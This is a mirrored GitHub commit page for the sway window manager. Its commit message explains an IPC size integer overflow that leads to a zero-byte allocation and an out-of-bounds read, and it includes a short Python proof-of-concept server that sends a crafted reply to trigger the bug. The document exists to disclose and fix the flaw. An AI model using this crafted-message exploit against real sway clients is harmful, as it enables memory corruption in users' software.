mirror of
https://github.com/swaywm/sway.git
synced 2026-04-22 06:46:27 -04:00
edcdb5552d
The size of IPC data is stored in an unsigned 32 bit data type within
the IPC message header. In order to terminate the received data with a
nul byte, one additional byte is allocated.
It is not checked if the transmitted size is 2^32 - 1. Adding one more
byte would overflow and lead to 0 byte allocation.
On 64 bit systems, the recv call with 2^32 - 1 does not fail instantly
but reads data from the server into unallocated memory.
Prevent override of unallocated memory by aborting communication.
Proof of Concept Python server (use 64 bit address sanitized client):
```
import os
import socket
os.remove('/tmp/sway-poc.socket')
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind('/tmp/sway-poc.socket')
server.listen(1)
print('waiting for client')
(client, address) = server.accept()
client.send(b'\x69\x33\x2D\x69\x70\x63\xFF\xFF\xFF\xFF\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF')
input('sent reply, press enter')
client.close()
```
|
||
|---|---|---|
| .. | ||
| sway | ||
| swaybar | ||
| swaynag | ||
| background-image.h | ||
| cairo.h | ||
| ipc-client.h | ||
| ipc.h | ||
| list.h | ||
| log.h | ||
| loop.h | ||
| meson.build | ||
| pango.h | ||
| pool-buffer.h | ||
| stringop.h | ||
| util.h | ||